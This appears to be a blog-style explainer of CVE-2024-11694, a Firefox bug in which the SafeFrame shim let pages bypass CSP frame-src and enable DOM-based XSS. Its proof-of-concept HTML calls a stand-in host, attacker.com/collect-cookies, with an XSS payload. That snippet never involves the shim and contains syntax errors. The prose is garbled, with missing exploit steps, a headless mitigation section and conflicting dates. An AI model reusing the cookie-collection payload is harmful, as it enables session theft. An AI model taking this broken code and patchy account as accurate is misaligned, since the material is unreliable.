CVE-2024-11694 - Firefox Enhanced Tracking Protection Bug Leads to CSP and XSS Bypass via SafeFrame Shim

In early 2024, Mozilla patched a high-risk security flaw impacting Firefox, Firefox ESR, and Thunderbird. Labeled as CVE-2024-11694, this flaw compromises the integrity of Enhanced Tracking Protection (ETP)'s "Strict" mode and undermines important web security headers like Content Security Policy (CSP). Attackers could bypass CSP's frame-src restrictions and execute DOM-based XSS attacks, jeopardizing the safety of users who depend on these features for privacy and security.

This article will break down CVE-2024-11694 in simple terms, provide technical insights with code snippets, and explain how the bug could be exploited.

What is CVE-2024-11694?

Mozilla's Enhanced Tracking Protection (ETP) helps keep users safe from trackers and unwanted scripts. In "Strict" mode, ETP sometimes uses a "shim" (a kind of workaround or patch) to keep websites functional while blocking trackers. But something unexpected happened: the Google SafeFrame shim in the Web Compatibility extension inadvertently made a hole in CSP protections.

Here's what was exposed

- Malicious websites could use an iframe (a frame within a web page) to sneak in content that should have been blocked by CSP's frame-src.
- They could trigger a JavaScript-based (DOM-based) cross-site scripting (XSS) attack through this bypass.

How the Vulnerability Works

CSP (frame-src) is a browser security policy that says what URLs are allowed in iframes. If the CSP header blocks a domain, nothing from there should open in an iframe—simple!

But with ETP in Strict mode, the browser sometimes rewrites pages, attempting to keep the page functional even as it blocks third-party scripts and trackers. If the site tries to use a Google SafeFrame (a special kind of iframe wrapper used for serving ads), the Web Compatibility extension would insert a shim to keep some ads working.

Due to a mistake in this shim’s logic, a dangerous gap appeared—any attacker could "smuggle" a malicious iframe, bypassing the site's CSP controls.

Worse, if Dom-based JavaScript on the target page used the SafeFrame, an attacker could also trigger DOM-based XSS.

Diagram

Attacker's malicious code
        ↓
Google SafeFrame shim (bypassing CSP frame-src)
        ↓
Browser interprets iframe as safe
        ↓
Malicious JavaScript executed

Exploit Details and Proof-of-Concept

Let’s get practical: how could this bug actually be used? Here’s a demonstrative code snippet:

<!-- Example of a malicious iframe injected using SafeFrame shim -->
<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Content-Security-Policy" content="default-src 'self'; frame-src 'self'">
</head>
<body>
  <!-- Normally, this would be blocked by CSP! -->
  <script>
    // Simulate presence of SafeFrame shim
    // The attack: inject an iframe to a malicious site, bypassing frame-src
    const safeFrameShim = (src) => {
      // Bypass CSP: Shim opens iframe to attacker domain
      let iframe = document.createElement('iframe');
      iframe.src = src; // e.g., "https://attacker.com/evil";
      document.body.appendChild(iframe);
    };

    // Exploit: attacker calls
    safeFrameShim("https://attacker.com/collect-cookies?xss=<script>alert(1337)</script>";);
  </script>
</body>
</html>

With the Google SafeFrame shim, the browser lets it through.

- If the attacker’s URL contains JavaScript (e.g., from a bad ad provider, or compromised CDN), arbitrary code runs in the context of the trusted page—an XSS.

Trick or cause it to load a crafted resource that triggers the SafeFrame shim.

3. Inject a malicious ad/frame/iframe (even if CSP would normally block it).

Keep automatic updates enabled for both browsers and extensions.

- Developers: If you’re protecting high-value apps, consider extra CSP validation on the server, and avoid relying solely on user CSP enforcement.

References

- Mozilla Security Advisory 2024-14
- CVE-2024-11694 at NVD
- Bugzilla: 1876534 - Bypass CSP frame-src using Google Safeframe shim in Webcompat extension
- Content Security Policy (CSP) Explained
- Mozilla Security Blog

In Summary

CVE-2024-11694 is a stark reminder that even privacy and security features can backfire if they interact the wrong way. Whether you’re a user, developer, or just want to stay safe online, keeping your software up to date is the best defense.


*Stay safe, and don’t forget to update your browser!*

Timeline

Published on: 11/26/2024 14:15:18 UTC
Last modified on: 11/27/2024 17:15:09 UTC